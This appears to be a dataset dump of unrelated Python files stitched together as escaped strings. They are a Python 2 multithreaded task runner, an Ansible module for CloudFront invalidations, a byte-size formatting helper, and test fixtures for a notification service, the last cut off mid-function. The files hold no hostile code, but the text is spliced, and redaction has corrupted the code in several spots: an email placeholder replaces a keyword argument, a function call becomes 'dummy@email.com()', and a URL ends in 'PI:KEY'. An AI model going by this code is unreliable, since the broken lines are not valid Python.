long\n\n# TODO: Currently num_threads is user-defined, which controls the number of threads to launch tasks\n# However, it would be better to include in the taskfile the number of cores needed\n# and define the number of cores available, enabling the workflow system to manage core allocation\n\n# Global variables\n\n# The number of threads used to handle tasks is passed as a parameter\nnum_threads=0\n\n# Array of threads (so they can be killed if needed)\nthreads=[]\n\n# Array of task workflow numbers (one per thread/worker)\nthreadtasknums=[]\n\n# Task queue\ntaskqueue=Queue()\n\n# This function handles executing a task defined by a taskfile\ndef runtask(taskfile):\n\n # Read and parse the taskfile with the following format\n # Note additional parameters will likely be added based on need (e.g., CWD, data-dir)\n \'\'\'\n program: /path/to/executable_with_a_name \n parameters: param1 -Optionalconfiguration param2 -AnotherParameter\n \'\'\'\n with open(taskfile,\'r\') as f:\n # Set the required parameters as None for error checking at the end\n program=None\n parameters=None\n for line in f:\n if line.startswith(""program:""):\n # Extract the entire program location from after the colon split()[1]) with whitespace removed (strip())\n program=line.split("":"",1)[1].strip() \n #print ""Program=""+program\n \n if line.startswith(""parameters:""):\n # Extract the parameter string from after the colon split()[1]) with whitespace removed (strip())\n parameters=line.split("":"",1)[1].strip() \n #print ""Parameters=""+parameters\n\n # Error checking for required parameters\n if program==None:\n raise Exception(""program missing in taskfile"",taskfile) \n if parameters==None:\n raise Exception(""parameters missing in taskfile"",taskfile) \n\n print ""Calling program=""+program,parameters\n \'\'\'\n In future versions that have defined input,output,stdout,etc.\n there could be more logic here to:\n - run each model in a defined directory\n - output stdout,stderr in the directory\n - package up output files for easier transfer\n - ...\n \'\'\'\n returncode=subprocess.check_call(program+"" ""+parameters,shell=True)\n\n# A task worker loops while there are tasks left in the taskqueue\n# Input parameter is a thread id (tid)\ndef taskworker(tid):\n while not taskqueue.empty():\n taskfile=taskqueue.get()\n\n tasknum=taskfile.split(""/"",1)[1].split(""."",1)[0].strip() \n tasknum=re.sub(""\\D"", """", tasknum)\n #print ""tid="",tid\n threadtasknums[tid]=int(tasknum)\n\n # While there is a dependency problem (lower order task numbers are still being processed)\n # then spintwait\n mintasknum=min(threadtasknums)\n while threadtasknums[tid]>mintasknum:\n #print ""min="",minthreadtasknum,""min(array)="",min(*threadtasknums),""nums["",i,""]="",threadtasknums[i]\n #if(threadtasknums[tid]<=min(*threadtasknums)): # If this task number is less than or equal to the minimum \n # break # then there are no dependencies, so you can break out of this infinite loop\n time.sleep(1) # this is a spin-wait loop\n mintasknum=min(*threadtasknums)\n\n print ""Thread"",tid,""running"",taskfile,""at"",str(datetime.datetime.now())\n try:\n runtask(taskfile)\n except:\n exit(1)\n taskqueue.task_done()\n threadtasknums[tid]=999999 # Set the tasknum for tid to 9999 so it doesn\'t influence dependencies\n print ""Thread"",tid,""quitting, because taskqueue is empty""\n\n# Main program code\ndef main():\n print ""Starting node workflow""\n\n try:\n opts,args=getopt.getopt(sys.argv[1:],""n:t:"",[""numthreads="",""tasklist=""])\n except getopt.GetoptError:\n print ""workflow.py -n -t ""\n sys.exit(1)\n\n # Set model filename and experiment name based on command-line parameter\n num_threads=0\n tasklistfile=""""\n for opt, arg in opts:\n if opt in (""-n"", ""--numthreads""):\n num_threads=int(arg)\n if opt in (""-t"", ""--tasklist""):\n tasklistfile=arg\n err=0\n if num_threads<=0:\n print "" [ ERROR ] Number of threads must be greater than 0""\n err=1\n if tasklistfile=="""":\n print "" [ ERROR ] Must provide tasklistfile""\n err=1\n if err==1:\n print ""workflow.py -n -t ""\n sys.exit(1)\n\n print ""Executing in current directory :"",os.getcwd()\n\n print ""Reading tasklist file""\n with open(tasklistfile,\'r\') as f:\n taskfiles = f.readlines()\n f.close()\n\n\n# tasksdir = \'tasks/\'\n# taskfiles = os.listdir(tasksdir) # Contains a list of task files to process \n taskfiles.sort()\n\n print ""Starting task queue""\n for taskfile in taskfiles:\n taskqueue.put(taskfile.strip())\n print ""Task queue contains "",taskqueue.qsize(),"" tasks""\n\n # Start the workflow engine\n # Currently the logic is simple -> one task==one thread==one core but that will need\n # to be modified to account for multithreaded models (agent-based and climate)\n # so eventually this will need to parse the task to determine the number of cores\n # needed by the task and dynamically manage the number of tasks running simultaneously\n print ""Starting "",num_threads,"" threads""\n for i in range(num_threads):\n threadtasknums.append(-1)\n t=threading.Thread(target=taskworker,args=(i,))\n t.daemon=True\n t.setDaemon(True)\n t.start()\n threads.append(t)\n\n # Now we wait until all of the tasks are finished.\n print ""Waiting for threads to finish""\n\n # Normally you can use a blocking .join, but then you cannot kill the process\n # So instead we spin-wait and catch ^C so a user can kill this process.\n# while threading.activeCount() > 0:\n# time.sleep(20)\n while taskqueue.qsize()>0:\n time.sleep(1)\n print ""taskqueue size"",taskqueue.qsize()\n \'\'\' # FIXME: Need to clean up this code, which was used for testing ^C \n try:\n time.sleep(5) # Wait 5 seconds before checking again\n # FIXME: In production this should be changed to 30\n # If Ctrl+C or other error, kill all of the threads\n except:\n while not taskqueue.empty(): # Empty the queue\n taskqueue.get()\n for i in threads:\n i.kill_received=True\n i.kill()\n exit(1)\n \'\'\'\n\n print ""Joining taskqueue""\n # At this point all of the tasks should be finished so we join them\n notfinished=1\n while notfinished==1:\n notfinished=0\n for i in range(num_threads):\n if threadtasknums[i]<999999:\n notfinished=1\n time.sleep(1)\n #while not taskqueue.join(1):\n # time.sleep(1)\n print ""Finished node workflow""\n\n# Run main\nif __name__==""__main__"":\n main()\n\n', '#!/usr/bin/python\n# Copyright (c) 2017 Ansible Project\n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import (absolute_import, division, print_function)\n__metaclass__ = type\n\nANSIBLE_METADATA = {\'metadata_version\': \'1.1\',\n \'status\': [\'preview\'],\n \'supported_by\': \'community\'}\n\nDOCUMENTATION = \'\'\'\n---\n\nmodule: cloudfront_invalidation\n\nshort_description: create invalidations for AWS CloudFront distributions\ndescription:\n - Allows for invalidation of a batch of paths for a CloudFront distribution.\n\nrequirements:\n - boto3 >= 1.0.0\n - python >= 2.6\n\nversion_added: ""2.5""\n\nauthor: Willem van Ketwich (@wilvk)\n\nextends_documentation_fragment:\n - aws\n - ec2\n\noptions:\n distribution_id:\n description:\n - The ID of the CloudFront distribution to invalidate paths for. Can be specified instead of the alias.\n required: false\n type: str\n alias:\n description:\n - The alias of the CloudFront distribution to invalidate paths for. Can be specified instead of distribution_id.\n required: false\n type: str\n caller_reference:\n description:\n - A unique reference identifier for the invalidation paths.\n - Defaults to current datetime stamp.\n required: false\n default:\n type: str\n target_paths:\n description:\n - A list of paths on the distribution to invalidate. Each path should begin with \'/\'. Wildcards are allowed. eg. \'/foo/bar/*\'\n required: true\n type: list\n elements: str\n\nnotes:\n - does not support check mode\n\n\'\'\'\n\nEXAMPLES = \'\'\'\n\n- name: create a batch of invalidations using a distribution_id for a reference\n cloudfront_invalidation:\n distribution_id: E15BU8SDCGSG57\n caller_reference: testing 123\n target_paths:\n - /testpathone/test1.css\n - /testpathtwo/test2.js\n - /testpaththree/test3.ss\n\n- name: create a batch of invalidations using an alias as a reference and one path using a wildcard match\n cloudfront_invalidation:\n alias: alias.test.com\n caller_reference: testing 123\n target_paths:\n - /testpathone/test4.css\n - /testpathtwo/test5.js\n - /testpaththree/*\n\n\'\'\'\n\nRETURN = \'\'\'\ninvalidation:\n description: The invalidation\'s information.\n returned: always\n type: complex\n contains:\n create_time:\n description: The date and time the invalidation request was first made.\n returned: always\n type: str\n sample: \'2018-02-01T15:50:41.159000+00:00\'\n id:\n description: The identifier for the invalidation request.\n returned: always\n type: str\n sample: I2G9MOWJZFV612\n invalidation_batch:\n description: The current invalidation information for the batch request.\n returned: always\n type: complex\n contains:\n caller_reference:\n description: The value used to uniquely identify an invalidation request.\n returned: always\n type: str\n sample: testing 123\n paths:\n description: A dict that contains information about the objects that you want to invalidate.\n returned: always\n type: complex\n contains:\n items:\n description: A list of the paths that you want to invalidate.\n returned: always\n type: list\n sample:\n - /testpathtwo/test2.js\n - /testpathone/test1.css\n - /testpaththree/test3.ss\n quantity:\n description: The number of objects that you want to invalidate.\n returned: always\n type: int\n sample: 3\n status:\n description: The status of the invalidation request.\n returned: always\n type: str\n sample: Completed\nlocation:\n description: The fully qualified URI of the distribution and invalidation batch request.\n returned: always\n type: str\n sample: https://cloudfront.amazonaws.PI:KEY\n\'\'\'\n\nfrom ansible.module_utils.ec2 import get_aws_connection_info\nfrom ansible.module_utils.ec2 import ec2_argument_spec, boto3_conn\nfrom ansible.module_utils.ec2 import snake_dict_to_camel_dict\nfrom ansible.module_utils.ec2 import camel_dict_to_snake_dict\nfrom ansible.module_utils.aws.core import AnsibleAWSModule\nfrom ansible.module_utils.aws.cloudfront_facts import CloudFrontFactsServiceManager\nimport datetime\n\ntry:\n from botocore.exceptions import ClientError, BotoCoreError\nexcept ImportError:\n pass # caught by imported AnsibleAWSModule\n\n\nclass CloudFrontInvalidationServiceManager(object):\n """"""\n Handles CloudFront service calls to AWS for invalidations\n """"""\n\n def __init__(self, module):\n self.module = module\n self.create_client(\'cloudfront\')\n\n def create_client(self, resource):\n region, ec2_url, aws_connect_kwargs = get_aws_connection_info(self.module, boto3=True)\n self.client = boto3_conn(self.module, conn_type=\'client\', resource=resource, region=region, endpoint=ec2_url, **aws_connect_kwargs)\n\n def create_invalidation(self, distribution_id, invalidation_batch):\n current_invalidation_response = self.get_invalidation(distribution_id, invalidation_batch[\'CallerReference\'])\n try:\n response = self.client.create_invalidation(DistributionId=distribution_id, InvalidationBatch=invalidation_batch)\n response.pop(\'ResponseMetadata\', None)\n if current_invalidation_response:\n return response, False\n else:\n return response, True\n except BotoCoreError as e:\n self.module.fail_json_aws(e, msg=""Error creating CloudFront invalidations."")\n except ClientError as e:\n if (\'Your request contains a caller reference that was used for a previous invalidation batch \'\n \'for the same distribution.\' in e.response[\'Error\'][\'Message\']):\n self.module.warn(""InvalidationBatch target paths are not modifiable. ""\n ""To make a new invalidation please update caller_reference."")\n return current_invalidation_response, False\n else:\n self.module.fail_json_aws(e, msg=""Error creating CloudFront invalidations."")\n\n def get_invalidation(self, distribution_id, caller_reference):\n current_invalidation = {}\n # find all invalidations for the distribution\n try:\n paginator = self.client.get_paginator(\'list_invalidations\')\n invalidations = paginator.paginate(DistributionId=distribution_id).build_full_result().get(\'InvalidationList\', {}).get(\'Items\', [])\n invalidation_ids = [inv[\'Id\'] for inv in invalidations]\n except (BotoCoreError, ClientError) as e:\n self.module.fail_json_aws(e, msg=""Error listing CloudFront invalidations."")\n\n # check if there is an invalidation with the same caller reference\n for inv_id in invalidation_ids:\n try:\n invalidation = self.client.get_invalidation(DistributionId=distribution_id, Id=inv_id)[\'Invalidation\']\n caller_ref = invalidation.get(\'InvalidationBatch\', {}).get(\'CallerReference\')\n except (BotoCoreError, ClientError) as e:\n self.module.fail_json_aws(e, msg=""Error getting CloudFront invalidation {0}"".format(inv_id))\n if caller_ref == caller_reference:\n current_invalidation = invalidation\n break\n\n current_invalidation.pop(\'ResponseMetadata\', None)\n return current_invalidation\n\n\nclass CloudFrontInvalidationValidationManager(object):\n """"""\n Manages CloudFront validations for invalidation batches\n """"""\n\n def __init__(self, module):\n self.module = module\n self.__cloudfront_facts_mgr = CloudFrontFactsServiceManager(module)\n\n def validate_distribution_id(self, distribution_id, alias):\n try:\n if distribution_id is None and alias is None:\n self.module.fail_json(msg=""distribution_id or alias must be specified"")\n if distribution_id is None:\n distribution_id = self.__cloudfront_facts_mgr.get_distribution_id_from_domain_name(alias)\n return distribution_id\n except (ClientError, BotoCoreError) as e:\n self.module.fail_json_aws(e, msg=""Error validating parameters."")\n\n def create_aws_list(self, invalidation_batch):\n aws_list = {}\n aws_list[""Quantity""] = len(invalidation_batch)\n aws_list[""Items""] = invalidation_batch\n return aws_list\n\n def validate_invalidation_batch(self, invalidation_batch, caller_reference):\n try:\n if caller_reference is not None:\n valid_caller_reference = caller_reference\n else:\n valid_caller_reference = datetime.datetime.now().isoformat()\n valid_invalidation_batch = {\n \'paths\': self.create_aws_list(invalidation_batch),\n \'caller_reference\': valid_caller_reference\n }\n return valid_invalidation_batch\n except (ClientError, BotoCoreError) as e:\n self.module.fail_json_aws(e, msg=""Error validating invalidation batch."")\n\n\ndef main():\n argument_spec = ec2_argument_spec()\n\n argument_spec.update(dict(\n caller_reference=dict(),\n distribution_id=dict(),\n alias=dict(),\n target_paths=dict(required=True, type=\'list\')\n ))\n\n module = AnsibleAWSModule(argument_spec=argument_spec, supports_check_mode=False, mutually_exclusive=[[\'distribution_id\', \'alias\']])\n\n validation_mgr = CloudFrontInvalidationValidationManager(module)\n service_mgr = CloudFrontInvalidationServiceManager(module)\n\n caller_reference = module.params.get(\'caller_reference\')\n distribution_id = module.params.get(\'distribution_id\')\n alias = module.params.get(\'alias\')\n target_paths = module.params.get(\'target_paths\')\n\n result = {}\n\n distribution_id = validation_mgr.validate_distribution_id(distribution_id, alias)\n valid_target_paths = validation_mgr.validate_invalidation_batch(target_paths, caller_reference)\n valid_pascal_target_paths = snake_dict_to_camel_dict(valid_target_paths, True)\n result, changed = service_mgr.create_invalidation(distribution_id, valid_pascal_target_paths)\n\n module.exit_json(changed=changed, **camel_dict_to_snake_dict(result))\n\n\nif __name__ == \'__main__\':\n main()\n', '#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Copyright (C) 2006 José de Paula Eufrásio Junior (dummy@email.com) AND\n# Yves Junqueira (dummy@email.com)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\n\n# from http://www.voidspace.org.uk/python/pathutils.html (BSD License)\n\ndef formatbytes(sizeint, configdict=None, **configs):\n """"""\n Given a file size as an integer, return a nicely formatted string that\n represents the size. Has various options to control it\'s output.\n \n You can pass in a dictionary of arguments or keyword arguments. Keyword\n arguments override the dictionary and there are sensible defaults for options\n you don\'t set.\n \n Options and defaults are as follows :\n \n * ``forcekb = False`` - If set this forces the output to be in terms\n of kilobytes and bytes only.\n \n * ``largestonly = True`` - If set, instead of outputting \n ``1 Mbytes, 307 Kbytes, 478 bytes`` it outputs using only the largest \n denominator - e.g. ``1.3 Mbytes`` or ``17.2 Kbytes``\n \n * ``kiloname = \'Kbytes\'`` - The string to use for kilobytes\n \n * ``meganame = \'Mbytes\'`` - The string to use for Megabytes\n \n * ``bytename = \'bytes\'`` - The string to use for bytes\n \n * ``nospace = True`` - If set it outputs ``1Mbytes, 307Kbytes``, \n notice there is no space.\n \n Example outputs : ::\n \n 19Mbytes, 75Kbytes, 255bytes\n 2Kbytes, 0bytes\n 23.8Mbytes\n \n .. note::\n \n It currently uses the plural form even for singular.\n """"""\n defaultconfigs = { \'forcekb\' : False,\n \'largestonly\' : True,\n \'kiloname\' : \'Kbytes\',\n \'meganame\' : \'Mbytes\',\n \'bytename\' : \'bytes\',\n \'nospace\' : True}\n if configdict is None:\n configdict = {}\n for entry in configs:\n # keyword parameters override the dictionary passed in\n configdict[entry] = configs[entry]\n #\n for keyword in defaultconfigs:\n if not configdict.has_key(keyword):\n configdict[keyword] = defaultconfigs[keyword]\n #\n if configdict[\'nospace\']:\n space = \'\'\n else:\n space = \' \'\n #\n mb, kb, rb = bytedivider(sizeint)\n if configdict[\'largestonly\']:\n if mb and not configdict[\'forcekb\']:\n return stringround(mb, kb)+ space + configdict[\'meganame\']\n elif kb or configdict[\'forcekb\']:\n if mb and configdict[\'forcekb\']:\n kb += 1024*mb\n return stringround(kb, rb) + space+ configdict[\'kiloname\']\n else:\n return str(rb) + space + configdict[\'bytename\']\n else:\n outstr = \'\'\n if mb and not configdict[\'forcekb\']:\n outstr = str(mb) + space + configdict[\'meganame\'] +\', \'\n if kb or configdict[\'forcekb\'] or mb:\n if configdict[\'forcekb\']:\n kb += 1024*mb\n outstr += str(kb) + space + configdict[\'kiloname\'] +\', \'\n return outstr + str(rb) + space + configdict[\'bytename\']\n\n\n', 'import random\nimport uuid\nfrom datetime import date, datetime, timedelta\n\nimport pytest\n\nfrom app import db\nfrom app.dao import fact_processing_time_dao\nfrom app.dao.email_branding_dao import dao_create_email_branding\nfrom app.dao.inbound_sms_dao import dao_create_inbound_sms\nfrom app.dao.invited_org_user_dao import save_invited_org_user\nfrom app.dao.invited_user_dao import save_invited_user\nfrom app.dao.jobs_dao import dao_create_job\nfrom app.dao.notifications_dao import dao_create_notification\nfrom app.dao.organisation_dao import (\n dao_add_service_to_organisation,\n dao_create_organisation,\n)\nfrom app.dao.permissions_dao import permission_dao\nfrom app.dao.service_callback_api_dao import save_service_callback_api\nfrom app.dao.service_data_retention_dao import insert_service_data_retention\nfrom app.dao.service_inbound_api_dao import save_service_inbound_api\nfrom app.dao.service_permissions_dao import dao_add_service_permission\nfrom app.dao.service_sms_sender_dao import (\n dao_update_service_sms_sender,\n update_existing_sms_sender_with_inbound_number,\n)\nfrom app.dao.services_dao import dao_add_user_to_service, dao_create_service\nfrom app.dao.templates_dao import dao_create_template, dao_update_template\nfrom app.dao.users_dao import save_model_user\nfrom app.models import (\n EMAIL_TYPE,\n KEY_TYPE_NORMAL,\n LETTER_TYPE,\n MOBILE_TYPE,\n SMS_TYPE,\n AnnualBilling,\n ApiKey,\n BroadcastEvent,\n BroadcastMessage,\n BroadcastProvider,\n BroadcastProviderMessage,\n BroadcastProviderMessageNumber,\n BroadcastStatusType,\n Complaint,\n DailySortedLetter,\n Domain,\n EmailBranding,\n FactBilling,\n FactNotificationStatus,\n FactProcessingTime,\n InboundNumber,\n InboundSms,\n InvitedOrganisationUser,\n InvitedUser,\n Job,\n LetterBranding,\n LetterRate,\n Notification,\n NotificationHistory,\n Organisation,\n Permission,\n Rate,\n ReturnedLetter,\n Service,\n ServiceCallbackApi,\n ServiceContactList,\n ServiceEmailReplyTo,\n ServiceGuestList,\n ServiceInboundApi,\n ServiceLetterContact,\n ServicePermission,\n ServiceSmsSender,\n Template,\n TemplateFolder,\n User,\n WebauthnCredential,\n)\n\n\ndef create_user(\n *,\n mobile_number=""+447700900986"",\n dummy@email.com"",\n state=\'active\',\n id_=None,\n name=""Test User""\n):\n data = {\n \'id\': id_ or uuid.uuid4(),\n \'name\': name,\n \'email_address\': email,\n \'password\': \'password\',\n \'mobile_number\': mobile_number,\n \'state\': state\n }\n user = User.query.filter_by(email_address=email).first()\n if not user:\n user = User(**data)\n save_model_user(user, validated_email_access=True)\n return user\n\n\ndef create_permissions(user, service, *permissions):\n permissions = [\n Permission(service_id=service.id, user_id=user.id, permission=p)\n for p in permissions\n ]\n\n permission_dao.set_user_service_permission(user, service, permissions, _commit=True)\n\n\ndef create_service(\n user=None,\n service_name=""Sample service"",\n service_id=None,\n restricted=False,\n count_as_live=True,\n service_permissions=None,\n research_mode=False,\n active=True,\n email_from=None,\n prefix_sms=True,\n message_limit=1000,\n organisation_type=\'central\',\n check_if_service_exists=False,\n go_live_user=None,\n go_live_at=None,\n crown=True,\n organisation=None,\n purchase_order_number=None,\n billing_contact_names=None,\n billing_contact_email_addresses=None,\n billing_reference=None,\n):\n if check_if_service_exists:\n service = Service.query.filter_by(name=service_name).first()\n if (not check_if_service_exists) or (check_if_service_exists and not service):\n service = Service(\n name=service_name,\n message_limit=message_limit,\n restricted=restricted,\n email_from=email_from if email_from else service_name.lower().replace(\' \', \'.\'),\n created_by=user if user else create_user(dummy@email.com())),\n prefix_sms=prefix_sms,\n organisation_type=organisation_type,\n organisation=organisation,\n go_live_user=go_live_user,\n go_live_at=go_live_at,\n crown=crown,\n purchase_order_number=purchase_order_number,\n billing_contact_names=billing_contact_names,\n billing_contact_email_addresses=billing_contact_email_addresses,\n billing_reference=billing_reference,\n )\n dao_create_service(\n service,\n service.created_by,\n service_id,\n service_permissions=service_permissions,\n )\n\n service.active = active\n service.research_mode = research_mode\n service.count_as_live = count_as_live\n else:\n if user and user not in service.users:\n dao_add_user_to_service(service, user)\n\n return service\n\n\ndef create_service_with_inbound_number(\n inbound_number=\'1234567\',\n *args, **kwargs\n):\n service = create_service(*args, **kwargs)\n\n sms_sender = ServiceSmsSender.query.filter_by(service_id=service.id).first()\n inbound = create_inbound_number(number=inbound_number, service_id=service.id)\n update_existing_sms_sender_with_inbound_number(service_sms_sender=sms_sender,\n sms_sender=inbound_number,\n inbound_number_id=inbound.id)\n\n return service\n\n\ndef create_service_with_defined_sms_sender(\n sms_sender_value=\'1234567\',\n *args, **kwargs\n):\n service = create_service(*args, **kwargs)\n\n sms_sender = ServiceSmsSender.query.filter_by(service_id=service.id).first()\n dao_update_service_sms_sender(service_id=service.id,\n service_sms_sender_id=sms_sender.id,\n is_default=True,\n sms_sender=sms_sender_value)\n\n return service\n\n\ndef create_template(\n service,\n template_type=SMS_TYPE,\n template_name=None,\n subject=\'Template subject\',\n content=\'Dear Sir/Madam, Hello. Yours Truly, The Government.\',\n reply_to=None,\n hidden=False,\n archived=False,\n folder=None,\n postage=None,\n process_type=\'normal\',\n contact_block_id=None\n):\n data = {\n \'name\': template_name or \'{} Template Name\'.format(template_type),\n \'template_type\': template_type,\n \'content\': content,\n \'service\': service,\n \'created_by\': service.created_by,\n \'reply_to\': reply_to,\n \'hidden\': hidden,\n \'folder\': folder,\n \'process_type\': process_type,\n }\n if template_type == LETTER_TYPE:\n data[""postage""] = postage or ""second""\n if contact_block_id:\n data[\'service_letter_contact_id\'] = contact_block_id\n if template_type != SMS_TYPE:\n data[\'subject\'] = subject\n template = Template(**data)\n dao_create_template(template)\n\n if archived:\n template.archived = archived\n dao_update_template(template)\n\n return template\n\n\ndef create_notification(\n template=None,\n job=None,\n job_row_number=None,\n to_field=None,\n status=\'created\',\n reference=None,\n created_at=None,\n sent_at=None,\n updated_at=None,\n billable_units=1,\n personalisation=None,\n api_key=None,\n key_type=KEY_TYPE_NORMAL,\n sent_by=None,\n client_reference=None,\n rate_multiplier=None,\n international=False,\n phone_prefix=None,\n scheduled_for=None,\n normalised_to=None,\n one_off=False,\n reply_to_text=None,\n created_by_id=None,\n postage=None,\n document_download_count=None,\n):\n assert job or template\n if job:\n template = job.template\n\n if created_at is None:\n created_at = datetime.utcnow()\n\n if to_field is None:\n to_field = \'+447700900855\' if template.template_type == SMS_TYPE else dummy@email.com\'\n\n if status not in (\'created\', \'validation-failed\', \'virus-scan-failed\', \'pending-virus-check\'):\n sent_at = sent_at or datetime.utcnow()\n updated_at = updated_at or datetime.utcnow()\n\n if not one_off and (job is None and api_key is None):\n # we did not specify in test - lets create it\n api_key = ApiKey.query.filter(ApiKey.service == template.service, ApiKey.key_type == key_type).first()\n if not api_key:\n api_key = create_api_key(template.service, key_type=key_type)\n\n if template.template_type == \'letter\' and postage is None:\n postage = \'second\'\n\n data = {\n \'id\': uuid.uuid4(),\n \'to\': to_field,\n \'job_id\': job and job.id,\n \'job\': job,\n \'service_id\': template.service.id,\n \'service\': template.service,\n \'template_id\': template.id,\n \'template_version\': template.version,\n \'status\': status,\n \'reference\': reference,\n \'created_at\': created_at,\n \'sent_at\': sent_at,\n \'billable_units\': billable_units,\n \'personalisation\': personalisation,\n \'notification_type\': template.template_type,\n \'api_key\': api_key,\n \'api_key_id\': api_key and api_key.id,\n \'key_type\': api_key.key_type if api_key else key_type,\n \'sent_by\': sent_by,\n \'updated_at\': updated_at,\n \'client_reference\': client_reference,\n \'job_row_number\': job_row_number,\n \'rate_multiplier\': rate_multiplier,\n \'international\': international,\n \'phone_prefix\': phone_prefix,\n \'normalised_to\': normalised_to,\n \'reply_to_text\': reply_to_text,\n \'created_by_id\': created_by_id,\n \'postage\': postage,\n \'document_download_count\': document_download_count,\n }\n notification = Notification(**data)\n dao_create_notification(notification)\n\n return notification\n\n\ndef create_notification_history(\n template=None,\n job=None,\n job_row_number=None,\n status=\'created\',\n reference=None,\n created_at=None,\n sent_at=None,\n updated_at=None,\n billable_units=1,\n api_key=None,\n key_type=KEY_TYPE_NORMAL,\n sent_by=None,\n client_reference=None,\n rate_multiplier=None,\n international=False,\n phone_prefix=None,\n created_by_id=None,\n postage=None,\n id=None\n):\n assert job or template\n if job:\n template = job.template\n\n if created_at is None:\n created_at = datetime.utcnow()\n\n if status != \'created\':\n sent_at = sent_at or datetime.utcnow()\n updated_at = updated_at or datetime.utcnow()\n\n if template.template_type == \'letter\' and postage is None:\n postage = \'second\'\n\n data = {\n \'id\': id or uuid.uuid4(),\n \'job_id\': job and job.id,\n \'job\': job,\n \'service_id\': template.service.id,\n \'service\': template.service,\n \'template_id\': template.id,\n \'template_version\': template.version,\n \'status\': status,\n \'reference\': reference,\n \'created_at\': created_at,\n \'sent_at\': sent_at,\n \'billable_units\': billable_units,\n \'notification_type\': template.template_type,\n \'api_key\': api_key,\n \'api_key_id\': api_key and api_key.id,\n \'key_type\': api_key.key_type if api_key else key_type,\n \'sent_by\': sent_by,\n \'updated_at\': updated_at,\n \'client_reference\': client_reference,\n \'job_row_number\': job_row_number,\n \'rate_multiplier\': rate_multiplier,\n \'international\': international,\n \'phone_prefix\': phone_prefix,\n \'created_by_id\': created_by_id,\n \'postage\': postage\n }\n notification_history = NotificationHistory(**data)\n db.session.add(notification_history)\n db.session.commit()\n\n return notification_history\n\n\ndef create_job(\n template,\n notification_count=1,\n created_at=None,\n job_status=\'pending\',\n scheduled_for=None,\n processing_started=None,\n processing_finished=None,\n original_file_name=\'some.csv\',\n archived=False,\n contact_list_id=None,\n):\n data = {\n \'id\': uuid.uuid4(),\n \'service_id\': template.service_id,\n \'service\': template.service,\n \'template_id\': template.id,\n \'template_version\': template.version,\n \'original_file_name\': original_file_name,\n \'notification_count\': notification_count,\n \'created_at\': created_at or datetime.utcnow(),\n \'created_by\': template.created_by,\n \'job_status\': job_status,\n \'scheduled_for\': scheduled_for,\n \'processing_started\': processing_started,\n \'processing_finished\': processing_finished,\n \'archived\': archived,\n \'contact_list_id\': contact_list_id,\n }\n job = Job(**data)\n dao_create_job(job)\n return job\n\n\ndef create_service_permission(service_id, permission=EMAIL_TYPE):\n dao_add_service_permission(\n service_id if service_id else create_service().id, permission)\n\n service_permissions = ServicePermission.query.all()\n\n return service_permissions\n\n\ndef create_inbound_sms(\n service,\n notify_number=None,\n user_number=\'447700900111\',\n provider_date=None,\n provider_reference=None,\n content=\'Hello\',\n provider=""mmg"",\n created_at=None\n):\n if not service.inbound_number:\n create_inbound_number(\n # create random inbound number\n notify_number or \'07{:09}\'.format(random.randint(0, 1e9 - 1)),\n provider=provider,\n service_id=service.id\n )\n\n inbound = InboundSms(\n service=service,\n created_at=created_at or datetime.utcnow(),\n notify_number=service.get_inbound_number(),\n user_number=user_number,\n provider_date=provider_date or datetime.utcnow(),\n provider_reference=provider_reference or \'foo\',\n content=content,\n provider=provider\n )\n dao_create_inbound_sms(inbound)\n return inbound\n\n\ndef create_service_inbound_api(\n service,\n url=""https://something.com"",\n bearer_token=""some_super_secret"",\n):\n service_inbound_api = ServiceInboundApi(service_id=service.id,\n url=url,\n bearer_token=bearer_token,\n updated_by_id=service.users[0].id\n )\n save_service_inbound_api(service_inbound_api)\n return service_inbound_api\n\n\ndef create_service_callback_api(\n service,\n url=""https://something.com"",\n bearer_token=""some_super_secret"",\n callback_type=""delivery_status""\n):\n service_callback_api = ServiceCallbackApi(service_id=service.id,\n url=url,\n bearer_token=bearer_token,\n updated_by_id=service.users[0].id,\n callback_type=callback_type\n )\n save_service_callback_api(service_callback_api)\n return service_callback_api\n\n\ndef create_email_branding(colour=\'blue\', logo=\'test_x2.png\', name=\'test_org_1\', text=\'DisplayName\'):\n data = {\n \'colour\': colour,\n \'logo\': logo,\n \'name\': name,\n \'text\': text,\n }\n email_branding = EmailBranding(**data)\n dao_create_email_branding(email_branding)\n\n return email_branding\n\n\ndef create_rate(start_date, value, notification_type):\n rate = Rate(\n id=uuid.uuid4(),\n valid_from=start_date,\n rate=value,\n notification_type=notification_type\n )\n db.session.add(rate)\n db.session.commit()\n return rate\n\n\ndef create_letter_rate(start_date=None, end_date=None, crown=True, sheet_count=1, rate=0.33, post_class=\'second\'):\n if start_date is None:\n start_date = datetime(2016, 1, 1)\n rate = LetterRate(\n id=uuid.uuid4(),\n start_date=start_date,\n end_date=end_date,\n crown=crown,\n sheet_count=sheet_count,\n rate=rate,\n post_class=post_class\n )\n db.session.add(rate)\n db.session.commit()\n return rate\n\n\ndef create_api_key(service, key_type=KEY_TYPE_NORMAL, key_name=None):\n id_ = uuid.uuid4()\n\n name = key_name if key_name else \'{} api key {}\'.format(key_type, id_)\n\n api_key = ApiKey(\n service=service,\n name=name,\n created_by=service.created_by,\n key_type=key_type,\n id=id_,\n secret=uuid.uuid4()\n )\n db.session.add(api_key)\n db.session.commit()\n return api_key\n\n\ndef create_inbound_number(number, provider=\'mmg\', active=True, service_id=None):\n inbound_number = InboundNumber(\n id=uuid.uuid4(),\n number=number,\n provider=provider,\n active=active,\n service_id=service_id\n )\n db.session.add(inbound_number)\n db.session.commit()\n return inbound_number\n\n\ndef create_reply_to_email(\n service,\n email_address,\n is_default=True,\n archived=False\n):\n data = {\n \'service\': service,\n \'email_address\': email_address,\n \'is_default\': is_default,\n \'archived\': archived,\n }\n reply_to = ServiceEmailReplyTo(**data)\n\n db.session.add(reply_to)\n db.session.commit()\n\n return reply_to\n\n\ndef create_service_sms_sender(\n service,\n sms_sender,\n is_default=True,\n inbound_number_id=None,\n archived=False\n):\n data = {\n \'service_id\': service.id,\n 